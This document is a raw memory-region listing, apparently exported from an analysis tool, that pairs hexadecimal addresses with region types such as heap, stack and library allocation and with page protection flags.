page read and write
A606000
trusted library allocation
page read and write
6C3E3000
unkown
page write copy
9CFE000
stack
page read and write
52F4000
trusted library allocation
page read and write
FB4000
heap
page read and write
FAA000
heap
page read and write
5330000
trusted library allocation
page read and write
28B8000
trusted library allocation
page read and write
25AE000
stack
page read and write
3900000
heap
page read and write
6228000
heap
page read and write
2535000
trusted library allocation
page read and write
5229000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
494000
unkown
page readonly
3FEB000
trusted library allocation
page read and write
2FB0000
heap
page read and write
2F91000
trusted library allocation
page read and write
1445000
trusted library allocation
page execute and read and write
2FCD000
trusted library allocation
page read and write
3116000
heap
page read and write
52F2000
trusted library allocation
page read and write
2F35000
trusted library allocation
page read and write
7E7E000
stack
page read and write
2FE9000
trusted library allocation
page read and write
26ED000
trusted library allocation
page read and write
83EB000
heap
page read and write
6950000
trusted library allocation
page read and write
4C16000
heap
page read and write
5307000
trusted library allocation
page read and write
2F6F000
trusted library allocation
page read and write
105A000
heap
page read and write
3069000
trusted library allocation
page read and write
798A000
heap
page read and write
4DAD000
stack
page read and write
7B60000
trusted library allocation
page read and write
2777000
trusted library allocation
page read and write
884C000
stack
page read and write
CAF000
stack
page read and write
102D000
heap
page read and write
248F000
trusted library allocation
page read and write
60BD000
stack
page read and write
77A8000
heap
page read and write
2B33000
trusted library allocation
page read and write
5060000
trusted library allocation
page read and write
56DE000
heap
page read and write
D7A000
heap
page read and write
270F000
trusted library allocation
page read and write
FB5000
heap
page read and write
389F000
stack
page read and write
48C1000
heap
page read and write
2F48000
trusted library allocation
page read and write
3084000
trusted library allocation
page read and write
7FDC8000
trusted library allocation
page execute and read and write
307B000
trusted library allocation
page read and write
5D00000
heap
page read and write
2DE0000
heap
page read and write
27B5000
trusted library allocation
page read and write
1273000
trusted library allocation
page read and write
9F7F000
trusted library allocation
page read and write
2A90000
trusted library allocation
page execute and read and write
7832000
heap
page read and write
AEA1000
trusted library allocation
page read and write
7DB0000
trusted library allocation
page read and write
26DB000
trusted library allocation
page read and write
5420000
trusted library allocation
page read and write
3083000
trusted library allocation
page read and write
934C000
stack
page read and write
37CE000
trusted library allocation
page read and write
7B5E000
stack
page read and write
4E9B000
heap
page read and write
FAC000
heap
page read and write
765000
heap
page read and write
409E000
trusted library allocation
page read and write
3EF4000
heap
page read and write
4BD4000
heap
page read and write
BE0000
heap
page read and write
41F8000
trusted library allocation
page read and write
1007000
heap
page read and write
13BA000
heap
page read and write
1300000
trusted library allocation
page read and write
3051000
trusted library allocation
page read and write
118D000
trusted library allocation
page execute and read and write
F46000
heap
page read and write
754E000
stack
page read and write
6ECB000
stack
page read and write
2E70000
trusted library allocation
page read and write
4182000
heap
page read and write
4E26000
heap
page read and write
4CAC000
stack
page read and write
5336000
trusted library allocation
page read and write
304D000
trusted library allocation
page read and write
2F25000
trusted library allocation
page read and write
105A000
trusted library allocation
page execute and read and write
2F86000
trusted library allocation
page read and write
1250000
trusted library allocation
page read and write
A37F000
trusted library allocation
page read and write
7EE40000
trusted library allocation
page execute and read and write
59D7000
trusted library allocation
page read and write
4A60000
trusted library allocation
page read and write
4ADB000
trusted library allocation
page read and write
9CBE000
stack
page read and write
308B000
trusted library allocation
page read and write
2F9D000
trusted library allocation
page read and write
F96000
heap
page read and write
11A0000
trusted library allocation
page read and write
52AF000
trusted library allocation
page read and write
3DC4000
heap
page read and write
478C000
stack
page read and write
52EB000
trusted library allocation
page read and write
D37000
trusted library allocation
page execute and read and write
3013000
trusted library allocation
page read and write
25B0000
trusted library allocation
page read and write
276F000
trusted library allocation
page read and write
4FE0000
heap
page read and write
4C80000
heap
page read and write
FA9000
heap
page read and write
3F76000
heap
page read and write
85BE000
stack
page read and write
27A9000
trusted library allocation
page read and write
323E000
stack
page read and write
428A000
heap
page read and write
6F26000
heap
page read and write
4940000
heap
page read and write
533B000
trusted library allocation
page read and write
9D0000
trusted library allocation
page read and write
46A4000
trusted library allocation
page read and write
52E4000
trusted library allocation
page read and write
6C621000
unkown
page execute read
280F000
trusted library allocation
page read and write
2EA8000
trusted library allocation
page read and write
47D000
stack
page read and write
57F0000
trusted library allocation
page read and write
1110000
heap
page read and write
869E000
stack
page read and write
8D0B000
stack
page read and write
4157000
trusted library allocation
page read and write
3067000
trusted library allocation
page read and write
2F7F000
trusted library allocation
page read and write
10F0000
trusted library allocation
page read and write
55CD000
stack
page read and write
2F4F000
trusted library allocation
page read and write
4757000
trusted library allocation
page read and write
48D4000
trusted library allocation
page read and write
8822000
heap
page read and write
2E8D000
heap
page read and write
6F1E000
heap
page read and write
2F85000
trusted library allocation
page read and write
2F9B000
trusted library allocation
page read and write
3061000
trusted library allocation
page read and write
A467000
trusted library allocation
page read and write
1002000
trusted library allocation
page read and write
5350000
trusted library allocation
page read and write
1056000
trusted library allocation
page execute and read and write
3B6E000
heap
page read and write
2D70000
heap
page read and write
278F000
trusted library allocation
page read and write
FA4000
heap
page read and write
89C0000
trusted library allocation
page read and write
5706000
trusted library allocation
page read and write
7960000
trusted library allocation
page execute and read and write
8775000
heap
page read and write
4067000
trusted library allocation
page read and write
9FF1000
trusted library allocation
page read and write
5360000
trusted library allocation
page read and write
5360000
trusted library allocation
page read and write
71CE000
stack
page read and write
2E2E000
trusted library allocation
page read and write
4CD0000
heap
page read and write
4B40000
heap
page read and write
6C52A000
unkown
page read and write
2FE1000
trusted library allocation
page read and write
1196000
trusted library allocation
page execute and read and write
768E000
stack
page read and write
2EA9000
trusted library allocation
page read and write
2FD3000
trusted library allocation
page read and write
78E0000
heap
page read and write
7B6E000
stack
page read and write
811B000
trusted library allocation
page read and write
2F9F000
trusted library allocation
page read and write
3FB3000
trusted library allocation
page read and write
30C9000
trusted library allocation
page read and write
803E000
stack
page read and write
745E000
stack
page read and write
45CF000
heap
page read and write
5340000
trusted library allocation
page read and write
2FFF000
trusted library allocation
page read and write
F50000
heap
page read and write
3F76000
heap
page read and write
2A8E000
stack
page read and write
4043000
heap
page read and write
27BF000
trusted library allocation
page read and write
CF0000
trusted library allocation
page read and write
79D0000
trusted library allocation
page read and write
5760000
heap
page read and write
4AF1000
trusted library allocation
page read and write
47DC000
stack
page read and write
3F91000
heap
page read and write
2F0A000
trusted library allocation
page read and write
DA0000
heap
page read and write
38A0000
heap
page read and write
5077000
heap
page read and write
3D0000
heap
page read and write
142D000
trusted library allocation
page execute and read and write
2783000
trusted library allocation
page read and write
9BD000
trusted library allocation
page execute and read and write
6C6BF000
unkown
page read and write
4248000
heap
page read and write
2731000
trusted library allocation
page read and write
8972000
trusted library allocation
page read and write
3635000
trusted library allocation
page read and write
CF7000
stack
page read and write
2741000
trusted library allocation
page read and write
8287000
trusted library allocation
page read and write
5E0000
heap
page read and write
4A10000
trusted library allocation
page read and write
2F2D000
trusted library allocation
page read and write
5535000
heap
page read and write
4F00000
heap
page read and write
48E1000
trusted library allocation
page read and write
301D000
trusted library allocation
page read and write
A2DF000
trusted library allocation
page read and write
58FE000
stack
page read and write
10B0000
trusted library allocation
page read and write
3FEF000
heap
page read and write
4ACC000
heap
page read and write
6C3DF000
unkown
page read and write
271D000
trusted library allocation
page read and write
594B000
heap
page read and write
2A5C000
stack
page read and write
2B20000
trusted library allocation
page execute and read and write
489A000
trusted library allocation
page read and write
4B02000
trusted library allocation
page read and write
2E11000
trusted library allocation
page read and write
6DAE000
stack
page read and write
52F0000
trusted library allocation
page read and write
1090000
heap
page read and write
546B000
stack
page read and write
5296000
trusted library allocation
page read and write
27A6000
trusted library allocation
page read and write
2753000
trusted library allocation
page read and write
599D000
heap
page read and write
1420000
trusted library allocation
page read and write
292B000
trusted library allocation
page read and write
27A5000
trusted library allocation
page read and write
28CB000
trusted library allocation
page read and write
4113000
heap
page read and write
A387000
trusted library allocation
page read and write
621B000
heap
page read and write
2F93000
trusted library allocation
page read and write
4903000
heap
page read and write
4951000
trusted library allocation
page read and write
A067000
trusted library allocation
page read and write
41D0000
trusted library allocation
page read and write
7A5E000
stack
page read and write
85E0000
trusted library allocation
page read and write
1108000
heap
page read and write
27AB000
trusted library allocation
page read and write
9900000
heap
page read and write
30C7000
trusted library allocation
page read and write
41D0000
trusted library allocation
page read and write
5340000
trusted library allocation
page read and write
8100000
trusted library allocation
page execute and read and write
9F8B000
trusted library allocation
page read and write
FAC000
heap
page read and write
758E000
stack
page read and write
2F7E000
unkown
page read and write
8EB000
stack
page read and write
2ACE000
trusted library allocation
page read and write
1060000
trusted library allocation
page read and write
2FA5000
trusted library allocation
page read and write
3F40000
heap
page read and write
FA4000
heap
page read and write
315F000
stack
page read and write
4C90000
trusted library section
page read and write
4167000
trusted library allocation
page read and write
32E0000
heap
page read and write
3019000
trusted library allocation
page read and write
2C61000
trusted library allocation
page read and write
7195000
heap
page read and write
6AEE000
stack
page read and write
5477000
heap
page read and write
646E000
stack
page read and write
730E000
stack
page read and write
30BF000
trusted library allocation
page read and write
4C15000
trusted library allocation
page read and write
47C5000
trusted library allocation
page read and write
3EA6000
trusted library allocation
page read and write
28AC000
heap
page read and write
4734000
trusted library allocation
page read and write
4B83000
heap
page read and write
3A0D000
heap
page read and write
A318000
trusted library allocation
page read and write
307F000
trusted library allocation
page read and write
A131000
trusted library allocation
page read and write
B6F000
stack
page read and write
2FB5000
trusted library allocation
page read and write
4DF0000
heap
page read and write
6257000
heap
page read and write
46B5000
trusted library allocation
page read and write
30B5000
trusted library allocation
page read and write
8875000
heap
page read and write
27B0000
trusted library allocation
page read and write
2F61000
trusted library allocation
page read and write
7916000
heap
page read and write
9A0000
trusted library allocation
page read and write
58AC000
trusted library allocation
page read and write
7E0000
heap
page read and write
3019000
trusted library allocation
page read and write
30CF000
trusted library allocation
page read and write
FA9000
heap
page read and write
3E88000
trusted library allocation
page read and write
2FAE000
trusted library allocation
page read and write
26D8000
trusted library allocation
page read and write
4230000
trusted library allocation
page read and write
76C0000
trusted library allocation
page read and write
2651000
trusted library allocation
page read and write
59FE000
stack
page read and write
FA7000
heap
page read and write
6C529000
unkown
page readonly
3077000
trusted library allocation
page read and write
FA0000
heap
page read and write
25F9000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
279F000
trusted library allocation
page read and write
46B1000
heap
page read and write
76A4000
heap
page read and write
5430000
trusted library allocation
page read and write
D68000
heap
page read and write
FBE000
heap
page read and write
270B000
trusted library allocation
page read and write
468C000
stack
page read and write
277D000
trusted library allocation
page read and write
6216000
heap
page read and write
47F5000
heap
page execute and read and write
27E1000
trusted library allocation
page read and write
3079000
trusted library allocation
page read and write
28A0000
heap
page read and write
7F840000
trusted library allocation
page execute and read and write
2DEE000
trusted library allocation
page read and write
5526000
trusted library allocation
page read and write
7D9F000
stack
page read and write
940000
heap
page read and write
63CB000
stack
page read and write
2A98000
stack
page read and write
FC8000
heap
page read and write
7660000
trusted library allocation
page read and write
2F71000
trusted library allocation
page read and write
39C7000
heap
page read and write
570D000
stack
page read and write
9660000
trusted library allocation
page read and write
2735000
trusted library allocation
page read and write
3DA8000
trusted library allocation
page read and write
6C626000
unkown
page readonly
27C3000
trusted library allocation
page read and write
2E9A000
trusted library allocation
page execute and read and write
3599000
trusted library allocation
page read and write
4653000
trusted library allocation
page read and write
7FDB0000
trusted library allocation
page execute and read and write
2FAB000
trusted library allocation
page read and write
5528000
trusted library allocation
page read and write
6EAE000
stack
page read and write
6C52D000
unkown
page readonly
27BB000
trusted library allocation
page read and write
40D0000
heap
page read and write
4206000
heap
page read and write
FB4000
heap
page read and write
61A1000
heap
page read and write
27ED000
trusted library allocation
page read and write
718E000
stack
page read and write
3F97000
heap
page read and write
2FFB000
trusted library allocation
page read and write
6C080000
unkown
page readonly
3031000
trusted library allocation
page read and write
37D1000
trusted library allocation
page read and write
7F570000
trusted library allocation
page execute and read and write
3029000
trusted library allocation
page read and write
77E000
stack
page read and write
3F40000
heap
page read and write
95D000
trusted library allocation
page execute and read and write
1030000
trusted library allocation
page read and write
88BF000
stack
page read and write
3AA2000
heap
page read and write
281D000
trusted library allocation
page read and write
3F2C000
heap
page read and write
3ECC000
heap
page read and write
52F7000
trusted library allocation
page read and write
4A1A000
trusted library allocation
page read and write
1263000
trusted library allocation
page execute and read and write
3061000
trusted library allocation
page read and write
3320000
trusted library allocation
page read and write
FA0000
heap
page read and write
3A4F000
heap
page read and write
2F69000
trusted library allocation
page read and write
2FD3000
trusted library allocation
page read and write
3B72000
heap
page read and write
54A3000
heap
page read and write
2941000
trusted library allocation
page read and write
6C3BB000
unkown
page read and write
2F37000
trusted library allocation
page read and write
274B000
trusted library allocation
page read and write
3E0000
heap
page read and write
D7E000
heap
page read and write
FAC000
heap
page read and write
48FC000
heap
page read and write
FAC000
heap
page read and write
D9E000
stack
page read and write
53D3000
trusted library allocation
page read and write
597D000
stack
page read and write
4C10000
trusted library allocation
page read and write
11C0000
trusted library allocation
page read and write
6212000
heap
page read and write
3F5B000
heap
page read and write
3005000
trusted library allocation
page read and write
3F6F000
heap
page read and write
53DA000
trusted library allocation
page read and write
2F31000
trusted library allocation
page read and write
9F73000
trusted library allocation
page read and write
3FDB000
heap
page read and write
1395000
heap
page read and write
3250000
heap
page read and write
33A0000
heap
page read and write
13A3000
heap
page read and write
D03000
trusted library allocation
page execute and read and write
404F000
heap
page read and write
739B000
stack
page read and write
4181000
trusted library allocation
page read and write
7970000
trusted library allocation
page read and write
4C0E000
stack
page read and write
2FCF000
trusted library allocation
page read and write
4CB7000
trusted library allocation
page read and write
78DF000
stack
page read and write
27EB000
trusted library allocation
page read and write
2EB2000
trusted library allocation
page read and write
57D0000
heap
page read and write
103F000
heap
page read and write
DCD000
heap
page read and write
3F68000
heap
page read and write
300D000
trusted library allocation
page read and write
1430000
trusted library allocation
page read and write
2F57000
trusted library allocation
page read and write
3896000
trusted library allocation
page read and write
4CC0000
trusted library allocation
page read and write
47FB000
heap
page read and write
2C78000
trusted library allocation
page read and write
3AA7000
heap
page read and write
4C8B000
stack
page read and write
2F9F000
trusted library allocation
page read and write
6DCB000
stack
page read and write
8EA000
heap
page read and write
25B4000
trusted library allocation
page read and write
3897000
trusted library allocation
page read and write
2F8F000
trusted library allocation
page read and write
4C40000
trusted library allocation
page read and write
7230000
trusted library allocation
page read and write
3349000
trusted library allocation
page read and write
6BFE000
stack
page read and write
8781000
heap
page read and write
89A0000
trusted library allocation
page read and write
9F37000
trusted library allocation
page read and write
F9C000
heap
page read and write
27D7000
trusted library allocation
page read and write
3058000
heap
page read and write
5078000
heap
page read and write
3EE0000
heap
page read and write
30D3000
trusted library allocation
page read and write
2910000
trusted library allocation
page read and write
6A6F000
stack
page read and write
4856000
trusted library allocation
page read and write
30D7000
trusted library allocation
page read and write
4742000
trusted library allocation
page read and write
2F12000
trusted library allocation
page read and write
81F0000
trusted library allocation
page execute and read and write
26C7000
trusted library allocation
page read and write
B30000
heap
page read and write
5380000
heap
page read and write
823E000
stack
page read and write
D2F000
stack
page read and write
8BCC000
heap
page read and write
5DBC000
heap
page read and write
2FBF000
trusted library allocation
page read and write
62D0000
heap
page read and write
57D000
stack
page read and write
30D1000
trusted library allocation
page read and write
38C3000
trusted library allocation
page read and write
2F86000
trusted library allocation
page read and write
F93000
heap
page read and write
6C48B000
unkown
page readonly
7CEC000
stack
page read and write
2F7D000
trusted library allocation
page read and write
140E000
stack
page read and write
594B000
stack
page read and write
1282000
trusted library allocation
page read and write
4A48000
heap
page read and write
A337000
trusted library allocation
page read and write
8BA6000
heap
page read and write
B84000
trusted library allocation
page read and write
6C6D5000
unkown
page readonly
302B000
trusted library allocation
page read and write
27CD000
trusted library allocation
page read and write
8B1E000
heap
page read and write
2B95000
heap
page read and write
4DE4000
heap
page read and write
7158000
heap
page read and write
FAC000
heap
page read and write
487F000
heap
page read and write
27B1000
trusted library allocation
page read and write
3037000
trusted library allocation
page read and write
4708000
trusted library allocation
page read and write
8844000
heap
page read and write
3F76000
heap
page read and write
7844000
heap
page read and write
300D000
trusted library allocation
page read and write
2CA0000
trusted library allocation
page read and write
962000
trusted library allocation
page read and write
66EE000
stack
page read and write
6D6E000
stack
page read and write
3013000
trusted library allocation
page read and write
3618000
trusted library allocation
page read and write
4E26000
heap
page read and write
9B3D000
stack
page read and write
70CF000
stack
page read and write
2775000
trusted library allocation
page read and write
7F4E0000
trusted library allocation
page execute and read and write
6CAE000
stack
page read and write
3F40000
heap
page read and write
3F61000
heap
page read and write
6034000
heap
page read and write
42C0000
trusted library allocation
page read and write
76D0000
trusted library allocation
page read and write
2EB1000
trusted library allocation
page read and write
3985000
heap
page read and write
30BD000
trusted library allocation
page read and write
2D2F000
stack
page read and write
810000
heap
page read and write
2F6F000
trusted library allocation
page read and write
734E000
stack
page read and write
6C6D1000
unkown
page read and write
640E000
stack
page read and write
569E000
stack
page read and write
6C79000
stack
page read and write
B50000
trusted library allocation
page execute and read and write
FA4000
heap
page read and write
569C000
heap
page read and write
88BD000
stack
page read and write
4C4E000
trusted library allocation
page read and write
FD0000
trusted library allocation
page read and write
3065000
trusted library allocation
page read and write
92E000
heap
page read and write
FA1000
heap
page read and write
4941000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
8120000
trusted library allocation
page read and write
308F000
trusted library allocation
page read and write
2FFD000
trusted library allocation
page read and write
D58000
heap
page read and write
2764000
trusted library allocation
page read and write
5EF0000
heap
page read and write
6B6E000
stack
page read and write
27FB000
trusted library allocation
page read and write
27A7000
trusted library allocation
page read and write
2E14000
trusted library allocation
page read and write
2F1C000
stack
page read and write
9C0000
trusted library allocation
page read and write
7BD0000
trusted library allocation
page read and write
7520000
trusted library allocation
page read and write
38A1000
heap
page read and write
28D7000
heap
page read and write
26DD000
trusted library allocation
page read and write
4475000
heap
page read and write
445A000
heap
page read and write
2759000
trusted library allocation
page read and write
303B000
trusted library allocation
page read and write
27DD000
trusted library allocation
page read and write
1140000
heap
page read and write
2B9F000
stack
page read and write
304B000
trusted library allocation
page read and write
311C000
heap
page read and write
6C085000
unkown
page readonly
4F7B000
trusted library allocation
page read and write
2CB0000
trusted library allocation
page read and write
785E000
stack
page read and write
47C3000
trusted library allocation
page read and write
3F40000
heap
page read and write
2F3B000
trusted library allocation
page read and write
5358000
trusted library allocation
page read and write
109E000
heap
page read and write
5230000
trusted library allocation
page read and write
75EE000
stack
page read and write
634E000
stack
page read and write
6CEC000
stack
page read and write
A091000
trusted library allocation
page read and write
F28000
heap
page read and write
FFB000
heap
page read and write
A006000
trusted library allocation
page read and write
4107000
trusted library allocation
page read and write
47B9000
heap
page read and write
9955000
heap
page read and write
2FBB000
trusted library allocation
page read and write
B70000
heap
page read and write
2BA6000
heap
page read and write
3005000
trusted library allocation
page read and write
5A0000
heap
page read and write
50CB000
stack
page read and write
7C9C000
stack
page read and write
3041000
trusted library allocation
page read and write
43FD000
heap
page read and write
5EF9000
trusted library allocation
page read and write
3F8A000
heap
page read and write
462E000
stack
page read and write
306F000
trusted library allocation
page read and write
4AD0000
trusted library allocation
page read and write
8B36000
heap
page read and write
A43C000
trusted library allocation
page read and write
2797000
trusted library allocation
page read and write
4137000
heap
page read and write
26C4000
trusted library allocation
page read and write
3063000
trusted library allocation
page read and write
119D000
stack
page read and write
2FE7000
trusted library allocation
page read and write
86F0000
trusted library allocation
page read and write
8E0F000
stack
page read and write
83AD000
heap
page read and write
2F4D000
trusted library allocation
page read and write
305F000
trusted library allocation
page read and write
2711000
trusted library allocation
page read and write
4029000
trusted library allocation
page read and write
52A0000
trusted library allocation
page read and write
7B1D000
stack
page read and write
6CBE000
stack
page read and write
2AC0000
heap
page execute and read and write
3FCD000
heap
page read and write
C6E000
stack
page read and write
FC8000
heap
page read and write
302F000
trusted library allocation
page read and write
5800000
trusted library allocation
page execute and read and write
3F47000
heap
page read and write
D1D000
trusted library allocation
page execute and read and write
2F63000
trusted library allocation
page read and write
2FF7000
trusted library allocation
page read and write
714E000
stack
page read and write
ED0000
heap
page read and write
692E000
stack
page read and write
46F3000
heap
page read and write
FA6000
heap
page read and write
48CC000
stack
page read and write
2638000
trusted library allocation
page read and write
2F69000
trusted library allocation
page read and write
A206000
trusted library allocation
page read and write
FA4000
heap
page read and write
301F000
trusted library allocation
page read and write
2E74000
trusted library allocation
page read and write
304D000
trusted library allocation
page read and write
26CC000
trusted library allocation
page read and write
3FC0000
heap
page read and write
6C510000
unkown
page readonly
127D000
trusted library allocation
page execute and read and write
D04000
trusted library allocation
page read and write
2FD7000
trusted library allocation
page read and write
FF0000
heap
page read and write
537E000
trusted library allocation
page read and write
2B44000
trusted library allocation
page read and write
3FD4000
heap
page read and write
4837000
trusted library allocation
page read and write
10AE000
stack
page read and write
129E000
stack
page read and write
4610000
heap
page read and write
5343000
heap
page read and write
3AAF000
heap
page read and write
5320000
trusted library allocation
page read and write
3C0000
heap
page read and write
792F000
stack
page read and write
2F0E000
trusted library allocation
page read and write
DBF000
heap
page read and write
834C000
heap
page read and write
2630000
heap
page read and write
790E000
heap
page read and write
8B8E000
stack
page read and write
528C000
heap
page read and write
2747000
trusted library allocation
page read and write
12A2000
trusted library allocation
page read and write
590E000
stack
page read and write
3E90000
heap
page read and write
FA1000
heap
page read and write
A5B000
heap
page read and write
FEA000
trusted library allocation
page execute and read and write
A3FC000
trusted library allocation
page read and write
307C000
trusted library allocation
page read and write
3591000
trusted library allocation
page read and write
3AA000
unkown
page read and write
A446000
trusted library allocation
page read and write
2EB9000
trusted library allocation
page read and write
4442000
heap
page read and write
86A0000
heap
page read and write
46AC000
heap
page read and write
50EA000
heap
page read and write
2E83000
trusted library allocation
page read and write
6C6C0000
unkown
page readonly
A531000
trusted library allocation
page read and write
267D000
trusted library allocation
page read and write
27CB000
trusted library allocation
page read and write
311B000
trusted library allocation
page read and write
2FFD000
trusted library allocation
page read and write
2490000
trusted library allocation
page read and write
3D40000
heap
page read and write
F58000
heap
page read and write
2FCF000
trusted library allocation
page read and write
106E000
stack
page read and write
2FF7000
trusted library allocation
page read and write
85C0000
heap
page read and write
11E2000
heap
page read and write
789000
stack
page read and write
5350000
trusted library allocation
page read and write
2ECD000
trusted library allocation
page read and write
FAC000
heap
page read and write
6260000
heap
page read and write
716A000
heap
page read and write
4107000
trusted library allocation
page read and write
3FD4000
heap
page read and write
5330000
trusted library allocation
page read and write
8990000
trusted library allocation
page execute and read and write
10C0000
heap
page read and write
3FE5000
heap
page read and write
3033000
trusted library allocation
page read and write
2805000
trusted library allocation
page read and write
6C511000
unkown
page execute read
2C7B000
trusted library allocation
page read and write
1052000
trusted library allocation
page read and write
47AB000
trusted library allocation
page read and write
278D000
trusted library allocation
page read and write
6C084000
unkown
page write copy
2E99000
trusted library allocation
page read and write
6E10000
trusted library allocation
page read and write
40F0000
heap
page read and write
F80000
heap
page read and write
2E65000
trusted library allocation
page read and write
77AD000
heap
page read and write
8950000
heap
page read and write
4F10000
trusted library allocation
page read and write
2D5E000
stack
page read and write
2F51000
trusted library allocation
page read and write
4CBA000
trusted library allocation
page read and write
475E000
stack
page read and write
994B000
heap
page read and write
4087000
trusted library allocation
page read and write
27BD000
trusted library allocation
page read and write
3E37000
trusted library allocation
page read and write
6E4E000
stack
page read and write
6A2D000
stack
page read and write
4DA0000
heap
page read and write
5620000
trusted library allocation
page read and write
5400000
heap
page read and write
4F5D000
stack
page read and write
2EB0000
heap
page read and write
3F39000
heap
page read and write
468F000
trusted library allocation
page read and write
53A0000
trusted library allocation
page read and write
2EA5000
trusted library allocation
page execute and read and write
A527000
trusted library allocation
page read and write
103D000
heap
page read and write
85B0000
heap
page read and write
620D000
heap
page read and write
2FED000
trusted library allocation
page read and write
6C3E000
stack
page read and write
8B00000
heap
page read and write
9EA8000
trusted library allocation
page read and write
FF9000
heap
page read and write
2E46000
trusted library allocation
page read and write
2D9F000
stack
page read and write
5C86000
heap
page read and write
756E000
stack
page read and write
4B80000
trusted library allocation
page read and write
1183000
trusted library allocation
page read and write
A05C000
trusted library allocation
page read and write
45CE000
heap
page read and write
706E000
stack
page read and write
65BC000
stack
page read and write
2E74000
trusted library allocation
page read and write
2CB0000
heap
page read and write
2D95000
heap
page read and write
30A9000
trusted library allocation
page read and write
1310000
heap
page read and write
7438000
heap
page read and write
467B000
trusted library allocation
page read and write
6DEE000
stack
page read and write
E54000
heap
page read and write
F25000
heap
page read and write
F95000
heap
page read and write
416000
remote allocation
page execute and read and write
4161000
trusted library allocation
page read and write
2769000
trusted library allocation
page read and write
2F3C000
trusted library allocation
page read and write
6C108000
unkown
page readonly
FDC000
heap
page read and write
85F0000
trusted library allocation
page read and write
960000
trusted library allocation
page read and write
47B9000
heap
page read and write
6C0F2000
unkown
page read and write
2C72000
trusted library allocation
page read and write
2FD0000
heap
page read and write
FB0000
trusted library allocation
page read and write
2F9D000
trusted library allocation
page read and write
A9F000
heap
page read and write
2751000
trusted library allocation
page read and write
6224000
heap
page read and write
1050000
heap
page read and write
3350000
heap
page read and write
3089000
trusted library allocation
page read and write
3085000
trusted library allocation
page read and write
329E000
stack
page read and write
4F40000
trusted library allocation
page execute and read and write
2E50000
heap
page execute and read and write
D00000
trusted library allocation
page read and write
5193000
heap
page read and write
279D000
trusted library allocation
page read and write
1415000
heap
page read and write
5F08000
trusted library allocation
page read and write
85ED000
trusted library allocation
page read and write
964A000
stack
page read and write
8290000
trusted library allocation
page read and write
262C000
stack
page read and write
1499000
heap
page read and write
7B50000
trusted library allocation
page read and write
A5E000
stack
page read and write
30FC000
trusted library allocation
page read and write
2FC0000
heap
page read and write
8B8000
heap
page read and write
FA7000
heap
page read and write
2FB8000
trusted library allocation
page read and write
33E0000
heap
page read and write
465F000
trusted library allocation
page read and write
E0B000
heap
page read and write
6C6D2000
unkown
page write copy
DBB000
heap
page read and write
1067000
trusted library allocation
page execute and read and write
27D1000
trusted library allocation
page read and write
73DD000
stack
page read and write
100B000
heap
page read and write
9F5000
heap
page read and write
404F000
heap
page read and write
4050000
heap
page read and write
26E9000
trusted library allocation
page read and write
5340000
trusted library allocation
page execute and read and write
2FFB000
trusted library allocation
page read and write
3B65000
heap
page read and write
130E000
stack
page read and write
6C060000
unkown
page readonly
6232000
heap
page read and write
39AE000
trusted library allocation
page read and write
8344000
heap
page read and write
6C113000
unkown
page write copy
2705000
trusted library allocation
page read and write
4FF4000
heap
page read and write
702F000
stack
page read and write
2EF0000
trusted library allocation
page execute and read and write
4DE5000
heap
page read and write
27C7000
trusted library allocation
page read and write
4FF4000
heap
page read and write
30B3000
trusted library allocation
page read and write
4EF0000
trusted library allocation
page read and write
134A000
heap
page read and write
273F000
stack
page read and write
53AC000
stack
page read and write
2BAD000
stack
page read and write
3F33000
heap
page read and write
A2A1000
trusted library allocation
page read and write
62A1000
trusted library allocation
page read and write
930000
trusted library allocation
page read and write
6C114000
unkown
page readonly
2B80000
heap
page execute and read and write
6D6D000
stack
page read and write
A1BC000
trusted library allocation
page read and write
A305000
trusted library allocation
page read and write
9F0C000
trusted library allocation
page read and write
9B8000
heap
page read and write
271B000
trusted library allocation
page read and write
5404000
heap
page read and write
3FE5000
heap
page read and write
2EC1000
trusted library allocation
page read and write
30A3000
trusted library allocation
page read and write
1080000
trusted library allocation
page read and write
4B50000
heap
page read and write
2785000
trusted library allocation
page read and write
893E000
stack
page read and write
494000
unkown
page readonly
2966000
trusted library allocation
page read and write
409E000
trusted library allocation
page read and write
8805000
heap
page read and write
5390000
trusted library allocation
page read and write
2F37000
trusted library allocation
page read and write
3AA000
unkown
page write copy
73C3000
heap
page read and write
D40000
heap
page read and write
6F8E000
stack
page read and write
3020000
heap
page read and write
5190000
heap
page read and write
2DD0000
heap
page read and write
8850000
heap
page read and write
FA1000
heap
page read and write
7BA0000
trusted library allocation
page read and write
74CE000
stack
page read and write
642B000
trusted library allocation
page read and write
4DD0000
trusted library allocation
page read and write
4151000
trusted library allocation
page read and write
D10000
trusted library allocation
page read and write
2924000
trusted library allocation
page read and write
4182000
heap
page read and write
7F0000
heap
page read and write
DC2000
heap
page read and write
56CE000
stack
page read and write
3043000
trusted library allocation
page read and write
307D000
trusted library allocation
page read and write
5720000
trusted library allocation
page execute and read and write
2FFE000
stack
page read and write
3021000
trusted library allocation
page read and write
307F000
trusted library allocation
page read and write
9EE6000
trusted library allocation
page read and write
58FE000
stack
page read and write
E02000
heap
page read and write
FC8000
heap
page read and write
4C18000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
27B7000
trusted library allocation
page read and write
4A13000
trusted library allocation
page read and write
2FA7000
trusted library allocation
page read and write
2763000
trusted library allocation
page read and write
2990000
trusted library allocation
page read and write
53CE000
trusted library allocation
page read and write
4834000
trusted library allocation
page read and write
3057000
trusted library allocation
page read and write
2B86000
heap
page read and write
6890000
heap
page read and write
407E000
trusted library allocation
page read and write
311A000
heap
page read and write
5FE4000
heap
page read and write
1270000
trusted library allocation
page read and write
535E000
trusted library allocation
page read and write
273F000
trusted library allocation
page read and write
728E000
stack
page read and write
311F000
trusted library allocation
page read and write
8B4A000
heap
page read and write
26E3000
trusted library allocation
page read and write
48F5000
heap
page read and write
126D000
trusted library allocation
page execute and read and write
2F08000
trusted library allocation
page read and write
5410000
trusted library allocation
page execute and read and write
487F000
heap
page read and write
768E000
stack
page read and write
2FC5000
trusted library allocation
page read and write
1128000
heap
page read and write
2FD1000
trusted library allocation
page read and write
28FB000
stack
page read and write
2FC9000
trusted library allocation
page read and write
3F54000
heap
page read and write
306B000
trusted library allocation
page read and write
49C4000
heap
page read and write
4941000
heap
page read and write
3035000
trusted library allocation
page read and write
2FA5000
trusted library allocation
page read and write
27F3000
trusted library allocation
page read and write
4D20000
trusted library allocation
page read and write
3B6D000
heap
page read and write
966000
trusted library allocation
page execute and read and write
3099000
trusted library allocation
page read and write
5980000
heap
page read and write
80F0000
heap
page read and write
76E0000
